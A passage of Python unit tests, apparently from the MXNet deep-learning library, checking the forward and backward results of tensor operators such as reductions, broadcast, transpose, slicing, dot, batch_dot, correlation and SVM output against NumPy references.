outgrad.reshape(keepdim_shape)/(data.size/outdata.size),
mx.symbol.mean, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.prod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (outdata.reshape(keepdim_shape) / data),
mx.symbol.prod, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nansum),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape)),
mx.symbol.nansum, 0.3, test_none_axis=test_none)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.nanprod),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
np.where(np.isnan(data), 0, outgrad.reshape(keepdim_shape) *
(outdata.reshape(keepdim_shape) / data)),
mx.symbol.nanprod, 0.3, test_none_axis=test_none)
# grad of max and min are sensitive to the precision of the calculation.
# Force numpy to match mxnet's float32.
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.max),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.max)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(np.float32(data), axis, keepdims, np.min),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) *
(np.equal(np.float32(data), outdata.reshape(keepdim_shape))),
mx.symbol.min)
test_reduce_inner(lambda data, axis, keepdims:np_reduce(data, axis, keepdims, np.linalg.norm),
lambda outgrad, data, outdata, axis, keepdims, keepdim_shape:
outgrad.reshape(keepdim_shape) * (data / outdata.reshape(keepdim_shape)),
mx.symbol.norm, test_exclude=False, test_none_axis=test_none)
@with_seed()
def test_broadcast():
sample_num = 200
for i in range(sample_num):
# Generate random data that has ndim between 1-7 and all the shape dims between 1-5
ndim = np.random.randint(1, 6)
target_shape = np.random.randint(1, 6, size=(ndim,))
axis = tuple(set(np.random.randint(0, ndim, np.random.randint(1, ndim + 1))))
shape = target_shape.copy()
size = tuple([shape[ele] for ele in axis])
for ele in axis:
shape[ele] = 1
target_shape_with_zero = list(target_shape)
for idx in range(len(target_shape_with_zero)):
if idx not in axis:
target_shape_with_zero[idx] = 0
break
a = mx.symbol.Variable('a')
sym_bcast_axis = mx.symbol.broadcast_axis(a, axis=axis, size=size)
sym_bcast_to = mx.symbol.broadcast_to(a, shape=tuple(target_shape))
sym_bcast_to_with_zero = mx.symbol.broadcast_to(a, shape=tuple(target_shape_with_zero))
sym_bcast_like = mx.symbol.broadcast_like(a, sym_bcast_to)
def test_broadcasting_ele(sym_bcast):
dat_npy = np.random.rand(*shape)
groundtruth = dat_npy
grad_nd = mx.nd.empty(shape)
outgrad_npy = np.random.rand(*target_shape)
grad_groundtruth = np_reduce(outgrad_npy, axis=axis, keepdims=True,
numpy_reduce_func=np.sum)
net = sym_bcast.bind(default_context(), args={'a': mx.nd.array(dat_npy)},
args_grad={'a': grad_nd})
net.forward(is_train=True)
assert (net.outputs[0].shape == target_shape).all()
assert_almost_equal(net.outputs[0], groundtruth, rtol=1e-4)
net.backward(out_grads=mx.nd.array(outgrad_npy))
assert_almost_equal(grad_nd, grad_groundtruth, rtol=1e-4)
test_broadcasting_ele(sym_bcast_axis)
test_broadcasting_ele(sym_bcast_to)
test_broadcasting_ele(sym_bcast_to_with_zero)
test_broadcasting_ele(sym_bcast_like)
@with_seed()
def test_transpose():
for ndim in range(1, 7):
for t in range(5):
dims = list(np.random.randint(1, 10, size=ndim))
axes = list(range(ndim))
random.shuffle(axes)
axes = tuple(axes)
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
@pytest.mark.serial
def test_pseudo2dtranspose():
def getTwoInts(mn, mx):
n1 = np.random.randint(mn, mx)
n2 = np.random.randint(mn, mx-1)
n2 = n2 if n2 < n1 else n2+1
return tuple(np.sort([n1, n2]))
def getTranspAxes(ndim):
axes = list(range(ndim))
n1, n2 = getTwoInts(0,ndim)
return tuple(axes[:n1]+axes[n2:]+axes[n1:n2])
for ndim in range(2, 7):
for dt in ['int8', 'half', 'int32', 'int64']:
for _ in range(5):
dims = list(np.random.randint(5, 20, size=ndim))
axes = getTranspAxes(ndim)
x = mx.nd.array(np.random.normal(size=dims), dtype=dt)
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x.asnumpy(), axes=axes), y.asnumpy())
@with_seed()
@pytest.mark.serial
def test_big_transpose():
n = [1]
d = list(np.random.randint(132, 160, size=1))
hw = list(np.random.randint(256, 320, size=2))
c = [10]
dims = n + d + hw + c
axes = (0,4,1,2,3)
x_np = np.random.normal(size=dims).astype('uint8')
x = mx.nd.array(x_np, dtype='uint8')
y = mx.nd.transpose(x, axes=axes)
assert_allclose(np.transpose(x_np, axes=axes), y.asnumpy().astype('uint8'))
axes = (0,2,3,4,1)
z = mx.nd.transpose(y, axes=axes)
assert_allclose(x_np, z.asnumpy().astype('uint8'))
@with_seed()
@pytest.mark.serial
def test_larger_transpose():
x = mx.nd.random.normal(shape=(50,51))
y = mx.nd.transpose(x)
assert_allclose(np.transpose(x.asnumpy()), y.asnumpy())
@with_seed()
def test_expand_dims():
for ndim in range(1, 6):
for axis in range(-ndim + 1, ndim):
x = np.random.normal(size=list(np.random.randint(1, 10, size=ndim)))
y = mx.nd.array(x)
x1 = np.expand_dims(x, axis=axis)
y1 = mx.nd.expand_dims(y, axis=axis)
assert_allclose(x1, y1.asnumpy())
assert_allclose(x1.shape, y1.shape)
@with_seed()
def test_crop():
for ndim in range(1, 6):
for t in range(5):
dims = []
begin = []
end = []
idx = []
for i in range(ndim):
d = random.randint(1, 5)
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if b == 0 and random.randint(0, 1):
b = None
elif b != 0 and random.randint(0, 1):
b -= d
if e == d and random.randint(0, 1):
e = None
elif e != d and random.randint(0, 1):
e -= d
dims.append(d)
begin.append(b)
end.append(e)
idx.append(slice(b, e))
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.crop(x, begin=tuple(begin), end=tuple(end))
assert_allclose(x.asnumpy()[idx], y.asnumpy())
vx = mx.sym.Variable('x')
vy = mx.sym.crop(vx, begin=tuple(begin), end=tuple(end))
check_numeric_gradient(vy, [x.asnumpy()])
@with_seed()
def test_slice_axis():
for ndim in range(1, 6):
shape = np.random.randint(1, 11, size=(ndim,))
for t in range(ndim):
d = shape[t]
b = random.randint(0, d-1)
e = random.randint(b+1, d)
if np.random.rand() > 0.6:
e = None
else:
if e < d and np.random.rand() > 0.5:
e = e - d
if np.random.rand() > 0.5:
b = b - d
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
idx[t] = slice(b, e)
X = mx.symbol.Variable('X')
x = mx.nd.array(np.random.normal(size=shape))
Y = mx.symbol.slice_axis(data=X, axis=t, begin=b, end=e)
xgrad = mx.nd.empty(x.shape)
exec1 = Y.bind(default_context(), args = [x], args_grad = {'X': xgrad})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
x_grad_npy = np.random.normal(size=x.shape)
xgrad = mx.nd.array(x_grad_npy)
exec2 = Y.bind(default_context(), args=[x], args_grad={'X': xgrad}, grad_req="add")
exec2.forward(is_train=True)
exec2.backward([exec2.outputs[0]])
xx = np.zeros(shape=x.shape, dtype=np.float32)
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx + x_grad_npy, xgrad.asnumpy(), atol=1E-5)
@with_seed()
def test_slice_like():
for ndim in range(1, 6):
from_shape = np.random.randint(1, 11, size=(ndim,))
shape = [s + np.random.randint(0, 3) for s in from_shape]
for t in range(ndim):
if t > 0:
axes = np.random.randint(0, ndim, size=t).tolist()
else:
axes = []
idx = []
for i in range(ndim):
idx.append(slice(0, shape[i]))
if i in axes or not axes:
idx[i] = slice(0, from_shape[i])
if axes:
pos = np.random.randint(0, t)
if axes[pos] > 0:
axes[pos] -= ndim # negative index
X = mx.symbol.Variable('X')
X_1 = mx.symbol.Variable('X1')
x = mx.nd.array(np.random.normal(size=shape))
x1 = mx.nd.array(np.random.normal(size=from_shape))
Y = mx.symbol.slice_like(data=X, shape_like=X_1, axes=axes)
xgrad = mx.nd.empty(x.shape)
xgrad1 = mx.nd.empty(x1.shape)
exec1 = Y.bind(default_context(), args = [x, x1],
args_grad = {'X': xgrad, 'X1': xgrad1})
exec1.forward(is_train=True)
y = exec1.outputs[0]
assert_allclose(x.asnumpy()[idx], y.asnumpy())
exec1.backward([y])
xx = x.asnumpy()
xx[:] = 0.0
xx[idx] = x.asnumpy()[idx]
assert_allclose(xx, xgrad.asnumpy())
assert_allclose(xgrad1.asnumpy(), mx.nd.zeros_like(xgrad1).asnumpy())
@with_seed()
def test_slice_like_different_types():
x = [[ 1., 2., 3., 4.],
[ 5., 6., 7., 8.],
[ 9., 10., 11., 12.]]
y = [[ 0., 0., 0.],
[ 0., 0., 0.]]
x = mx.nd.array(x)
y = mx.nd.array(y).astype('int32')
z = mx.nd.slice_like(x, y)
assert_allclose(z.asnumpy(), [[1,2,3],[5,6,7]])
@with_seed()
def test_reshape_like_different_types():
x = mx.nd.zeros((2, 3))
y = mx.nd.array([[1, 2], [3, 4], [5, 6]])
y = mx.nd.array(y).astype('int32')
z = mx.nd.reshape_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0],[0,0]])
@with_seed()
def test_broadcast_like_different_types():
x = mx.nd.zeros((2, 1))
y = mx.nd.ones((2, 2))
y = mx.nd.array(y).astype('int32')
z = mx.nd.broadcast_like(x, y)
assert_allclose(z.asnumpy(), [[0,0],[0,0]])
assert x.dtype == z.dtype
@with_seed()
def test_flip():
for ndim in range(1, 6):
for t in range(5):
dims = [random.randint(1,10) for i in range(ndim)]
axis = random.randint(0, ndim-1)
idx = [slice(None, None, -1) if i == axis else slice(None, None) for i in range(ndim)]
x = mx.nd.array(np.random.normal(size=dims))
y = mx.nd.flip(x, axis=axis)
assert_allclose(x.asnumpy()[idx], y.asnumpy())
@with_seed()
def test_stn():
import sys
np.set_printoptions(threshold=sys.maxsize)
num_filter = 2 # conv of loc net
kernel = (3, 3) # conv of loc net
num_hidden = 6 # fc of loc net
for n in [1, 2, 3, 4]:
for c in [1, 2, 3, 4]:
for h in [5, 9, 13, 17]: # for convenience test, this third and forth input dim should be 4x + 1
for w in [5, 9, 13, 17]:
data_shape = (n, c, h, w)
target_shape = (int((data_shape[2]+1)/2), int((data_shape[3]+1)/2))
data = mx.sym.Variable(name="data")
loc = mx.sym.Convolution(data=data, kernel=kernel, pad=(1, 1), num_filter=num_filter, name="loc_conv")
loc = mx.sym.Flatten(data=loc)
loc = mx.sym.FullyConnected(data=loc, num_hidden=num_hidden, name="loc_fc")
stn = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=target_shape,
transform_type="affine", sampler_type="bilinear")
arg_names = stn.list_arguments()
arg_shapes, out_shapes, _ = stn.infer_shape(data=data_shape)
# check shape
assert out_shapes[0] == (data_shape[0], data_shape[1], target_shape[0], target_shape[1])
dev = default_context()
#dev = mx.gpu(0)
args = {}
args['data'] = mx.random.normal(0, 1, data_shape, ctx=mx.cpu()).copyto(dev)
args['loc_conv_weight'] = mx.nd.zeros((num_filter, data_shape[1], kernel[0], kernel[1]), ctx=dev)
args['loc_conv_bias'] = mx.nd.zeros((num_filter,), ctx=dev)
args['loc_fc_weight'] = mx.nd.zeros((6, num_filter*data_shape[2]*data_shape[3]), ctx=dev)
args['loc_fc_bias'] = mx.nd.array([0.5, 0, 0, 0, 0.5, 0], ctx=dev)
grad_grad = [mx.nd.zeros(shape, ctx=dev) for shape in arg_shapes]
exe = stn.bind(dev, args=args, args_grad=grad_grad)
exe.forward(is_train=True)
out = exe.outputs[0]
# check forward
assert_almost_equal(out, args['data'].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
out_grad = mx.nd.ones(out.shape, ctx=dev)
exe.backward([out_grad])
# check backward
assert_almost_equal(out_grad, grad_grad[0].asnumpy()[:, :, h//4:h-h//4, w//4:w-w//4], rtol=1e-2, atol=1e-4)
def test_stn_valid_sampling():
target_shape = (
28,
28,
)
src_shape = (
42,
42,
)
data = mx.sym.Variable(name="data")
loc = mx.sym.Variable(name="loc")
data_array = np.zeros((
1,
1,
) + src_shape)
# Have an ever so slight rotation.
loc_array = np.array(
[[9.03887e-05, 1.00015, 0.00174931, 1.0003, 0.000311901,
-0.000919065]])
stn = mx.sym.SpatialTransformer(
data=data,
loc=loc,
target_shape=target_shape,
transform_type="affine",
sampler_type="bilinear")
grad_req = {k: 'write' for k in stn.list_arguments()}
grads = {
'data': mx.nd.array(np.zeros_like(data_array)),
'loc': mx.nd.array(np.zeros_like(loc_array))
}
executor = stn.bind(
ctx=default_context(),
args={'data': mx.nd.array(data_array),
'loc': mx.nd.array(loc_array)},
grad_req=grad_req,
args_grad=grads)
executor.forward(is_train=True)
executor.backward(mx.nd.ones((
1,
1,
) + target_shape))
@with_seed()
def test_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
ndims = [2]
if ctx.device_type == 'gpu':
dtypes += ['float16']
ndims += [1]
# Test normal dot.
for ndim in ndims:
for data_type in dtypes:
tol = 1e-2 if data_type == 'float16' else 1e-3
for m in range(1, 5):
for k in range(1, 5):
if ndim == 1 and k != 1:
pass
for n in range(1, 5):
a_shape = (m, k) if ndim == 2 else (m,)
b_shape = (k, n) if ndim == 2 else (n,)
a_npy = np.random.normal(0, 1, (m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((m, k), dtype=data_type)
bgrad_npy = np.empty((k, n), dtype=data_type)
c_npy[:, :] = np.dot(a_npy[:, :], b_npy[:, :])
bgrad_npy[:, :] = np.dot(a_npy[:, :].T, ograd_npy[:, :])
agrad_npy[:, :] = np.dot(ograd_npy[:, :], b_npy[:, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.dot(a, b)
exe = c.simple_bind(ctx=ctx, a=a_npy.shape, b=b_npy.shape)
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy, rtol=tol, atol=tol)
exe.backward(out_grads=[mx.nd.array(ograd_npy, mx.cpu()).astype(data_type)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy, rtol=tol, atol=tol)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy, rtol=tol, atol=tol)
# Test dot with transpose flag using gradient checker.
def dot_sym(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y)
def dot_sym_xT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True)
def dot_sym_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_b=True)
def dot_sym_xT_yT(data_type):
x = mx.sym.Variable('x', dtype=data_type)
y = mx.sym.Variable('y', dtype=data_type)
return mx.sym.dot(x, y, transpose_a=True, transpose_b=True)
for data_type in dtypes:
for ashape, bshape in [((3, 4), (4, 5)), ((2, 3, 4), (4, 5, 6))]:
m1_npy = np.random.uniform(-1, 1, ashape)
m1_npy = m1_npy.astype(data_type)
m2_npy = np.random.uniform(-1, 1, bshape)
m2_npy = m2_npy.astype(data_type)
check_numeric_gradient(dot_sym(data_type), [m1_npy, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT(data_type), [m1_npy.T, m2_npy], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_yT(data_type), [m1_npy, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
check_numeric_gradient(dot_sym_xT_yT(data_type), [m1_npy.T, m2_npy.T], numeric_eps=1e-1, rtol=2e-2, atol=1e-3)
@with_seed()
def test_batch_dot():
ctx = default_context()
dtypes = ['float32', 'float64']
if ctx.device_type == 'gpu':
dtypes += ['float16']
for data_type in dtypes:
for batch_size in range(1, 5):
for m in range(1, 5):
for k in range(1, 5):
for n in range(1, 5):
transpose_a = (np.random.rand() > 0.5)
transpose_b = (np.random.rand() > 0.5)
a_npy = np.random.normal(0, 1, (batch_size, m, k))
a_npy = a_npy.astype(data_type)
b_npy = np.random.normal(0, 1, (batch_size, k, n))
b_npy = b_npy.astype(data_type)
c_npy = np.empty((batch_size, m, n), dtype=data_type)
ograd_npy = np.random.normal(0, 1, (batch_size, m, n))
ograd_npy = ograd_npy.astype(data_type)
agrad_npy = np.empty((batch_size, m, k), dtype=data_type)
bgrad_npy = np.empty((batch_size, k, n), dtype=data_type)
a_init_grad_npy = np.random.normal(size=(batch_size, m, k))
a_init_grad_npy = a_init_grad_npy.astype(data_type)
b_init_grad_npy = np.random.normal(size=(batch_size, k, n))
b_init_grad_npy = b_init_grad_npy.astype(data_type)
for i in range(batch_size):
c_npy[i, :, :] = np.dot(a_npy[i, :, :], b_npy[i, :, :])
bgrad_npy[i, :, :] = np.dot(a_npy[i, :, :].T, ograd_npy[i, :, :])
agrad_npy[i, :, :] = np.dot(ograd_npy[i, :, :], b_npy[i, :, :].T)
a = mx.sym.Variable('a', dtype=data_type)
b = mx.sym.Variable('b', dtype=data_type)
c = mx.sym.batch_dot(a, b, transpose_a=transpose_a, transpose_b=transpose_b)
if transpose_a:
a_npy = np.transpose(a_npy, axes=(0, 2, 1))
agrad_npy = np.transpose(agrad_npy, axes=(0, 2, 1))
a_init_grad_npy = np.transpose(a_init_grad_npy, axes=(0, 2, 1))
if transpose_b:
b_npy = np.transpose(b_npy, axes=(0, 2, 1))
bgrad_npy = np.transpose(bgrad_npy, axes=(0, 2, 1))
b_init_grad_npy = np.transpose(b_init_grad_npy, axes=(0, 2, 1))
exe = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='write')
exe_add = c.simple_bind(ctx=ctx,
a=a_npy.shape, b=b_npy.shape, grad_req='add')
exe_add.grad_dict['a'][:] = a_init_grad_npy
exe_add.grad_dict['b'][:] = b_init_grad_npy
outputs = exe.forward(is_train=True, a=a_npy, b=b_npy)
assert_almost_equal(outputs[0], c_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe.grad_dict['a'], agrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe.grad_dict['b'], bgrad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
exe_add.forward(is_train=True, a=a_npy, b=b_npy)
exe_add.backward(out_grads=[mx.nd.array(ograd_npy, ctx=exe._ctx)])
assert_almost_equal(exe_add.grad_dict['a'],
agrad_npy + a_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
assert_almost_equal(exe_add.grad_dict['b'],
bgrad_npy + b_init_grad_npy,
rtol=1e-2 if data_type == 'float16' else 1e-3,
atol=1e-2 if data_type == 'float16' else 1e-4)
def get_correlation(data1,data2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply):
img1 = mx.sym.Variable('img1')
img2 = mx.sym.Variable('img2')
return mx.sym.Correlation(data1=img1,data2=img2,kernel_size =kernel_size,max_displacement = max_displacement,
stride1 = stride1,stride2 = stride2,pad_size= pad_size,is_multiply = is_multiply)
def correlation_forward(data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp2 = np.zeros((data1.shape[0],data1.shape[1],paddedbottomheight, paddedbottomwidth))
tmp1[:, :, pad_size:pad_size + data1.shape[2], pad_size:pad_size + data1.shape[3]] = data1[:,:,:,:]
tmp2[:, :, pad_size:pad_size + data2.shape[2], pad_size:pad_size + data2.shape[3]] = data2[:,:,:,:]
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
out[nbatch, top_channel, i, j] += tmp1[nbatch, channel,y1 + h, x1 + w] * tmp2[nbatch, channel, y2 + h,x2 + w]
else:
out[nbatch, top_channel, i, j] += abs(tmp1[nbatch, channel, y1 + h, x1 + w] - tmp2[nbatch, channel, y2 + h, x2 + w])
out /= float(kernel_size**2*data1.shape[1])
return out,tmp1,tmp2
def correlation_backward(out_grad,tmp1,tmp2,data1,data2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply):
# compute output's dimension
paddedbottomheight = data1.shape[2] + 2 * pad_size
paddedbottomwidth = data1.shape[3] + 2 * pad_size
kernel_radius = (kernel_size - 1) // 2
border_size = max_displacement + kernel_radius
top_width = (paddedbottomwidth - border_size * 2) // stride1
top_height = (paddedbottomheight - border_size * 2) // stride1
neighborhood_grid_radius = max_displacement // stride2
neighborhood_grid_width = neighborhood_grid_radius * 2 + 1
top_channels = neighborhood_grid_width * neighborhood_grid_width
out = np.zeros((data1.shape[0], top_channels, top_height, top_width))
tmp1_grad = np.zeros(tmp1.shape)
tmp2_grad = np.zeros(tmp2.shape)
for i in range(top_height):
for j in range(top_width):
for nbatch in range(data1.shape[0]):
# x1,y1 is the location in data1 , i,j is the location in output
x1 = j * stride1 + max_displacement
y1 = i * stride1 + max_displacement
for top_channel in range(top_channels):
s2o = (top_channel % neighborhood_grid_width - neighborhood_grid_radius) * stride2
s2p = (top_channel // neighborhood_grid_width - neighborhood_grid_radius) * stride2
# location in data2
x2 = x1 + s2o
y2 = y1 + s2p
for h in range(kernel_size):
for w in range(kernel_size):
for channel in range(data1.shape[1]):
if is_multiply:
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*tmp2[nbatch, channel, y2 + h,x2 + w]
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*tmp1[nbatch, channel, y1 + h,x1 + w]
else:
sgn = 1 if (tmp1[nbatch, channel, y1 + h,x1 + w]>=tmp2[nbatch, channel, y2 + h,x2 + w]) else -1
tmp1_grad[nbatch,channel,y1+h,x1+w]+= out_grad[nbatch,top_channel,i,j]*sgn
tmp2_grad[nbatch,channel,y2+h,x2+w]+= out_grad[nbatch,top_channel,i,j]*(-sgn)
tmp1_grad = tmp1_grad / float(kernel_size**2*data1.shape[1])
tmp2_grad = tmp2_grad / float(kernel_size**2*data1.shape[1])
return tmp1_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],tmp2_grad[:,:,pad_size:pad_size+data1.shape[2],pad_size:pad_size+data1.shape[3]],
def unittest_correlation(data_shape,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply,dtype):
img1 = np.random.random(data_shape)
img1 = img1.astype(dtype)
img2 = np.random.random(data_shape)
img2 = img2.astype(dtype)
net1 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply)
net2 = get_correlation(img1,img2,kernel_size,max_displacement,stride1,stride2,pad_size,is_multiply )
exe1 = net1.simple_bind(default_context(),img1=img1.shape,img2=img1.shape)
exe1.arg_dict['img1'][:] = img1
exe1.arg_dict['img2'][:] = img2
#cpu forward
exe1.forward(is_train=True)
# python forward
forward_result,tmp1,tmp2 = correlation_forward(img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# forward error
assert_almost_equal(exe1.outputs[0], forward_result, rtol=1e-4, atol=1e-4)
# out_grad
a = np.ones(forward_result.shape)
out_grad1 = mx.nd.array(a,default_context())
# cpu backward
exe1.backward(out_grads=out_grad1)
# python backward
grad1,grad2 = correlation_backward(a,tmp1,tmp2,img1,img2,pad_size,kernel_size,stride1,stride2,max_displacement,is_multiply)
# backward error
assert_almost_equal(exe1.grad_dict['img1'], grad1, rtol=1e-3, atol=1e-4)
assert_almost_equal(exe1.grad_dict['img2'], grad2, rtol=1e-3, atol=1e-4)
@with_seed()
def test_correlation():
def test_infer_type(dtype):
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
corr = mx.sym.Correlation(data1=a, data2=b)
arg_type1, out_type1, _ = corr.infer_type(a=dtype)
if arg_type1[0] != np.dtype(dtype) and arg_type1[1] != np.dtype(dtype) and out_type1[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from a is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
arg_type2, out_type2, _ = corr.infer_type(b=dtype)
if arg_type2[0] != np.dtype(dtype) and arg_type2[1] != np.dtype(dtype) and out_type2[0] != np.dtype(dtype):
msg = npt.npt.build_err_msg([a, b],
err_msg="Inferred type from b is not as expected, "
"Expected :%s %s %s, Got: %s %s %s"
% (dtype, dtype, dtype, arg_type1[0], arg_type1[1], out_type1[0]),
names=['a', 'b'])
raise AssertionError(msg)
for dtype in ['float16', 'float32']:
test_infer_type(dtype)
unittest_correlation((1,3,10,10), kernel_size = 1,max_displacement = 4,stride1 = 1,stride2 = 1,pad_size = 4,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 5,stride1 = 1,stride2 = 1,pad_size = 5,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,15,15), kernel_size = 1,max_displacement = 10,stride1 = 1,stride2 = 2,pad_size = 10,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = True, dtype = dtype)
unittest_correlation((5,1,4,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,6,4), kernel_size = 3,max_displacement = 1,stride1 = 2,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
unittest_correlation((5,1,11,11), kernel_size = 5,max_displacement = 1,stride1 = 1,stride2 = 1,pad_size = 2,is_multiply = False, dtype = dtype)
@with_seed()
def test_support_vector_machine_l1_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L, use_linear=True)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
assert_almost_equal(x_np, exec1.outputs[0])
exec1.backward()
l_mask = np.equal(l_np.reshape(shape[0],1),range(shape[1]))
l_mask = np.array(l_mask, dtype=np.float32)*2 -1
grad_np = (-1) * l_mask * np.greater(1 - l_mask * x_np, 0)
assert_almost_equal(grad_np, grad)
@with_seed()
def test_support_vector_machine_l2_svm():
xpu = default_context()
shape = (20, 10)
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SVMOutput(data=X, label=L)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
x_np = x_np.astype(np.float32)
l_np = np.random.randint(0, shape[1], (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
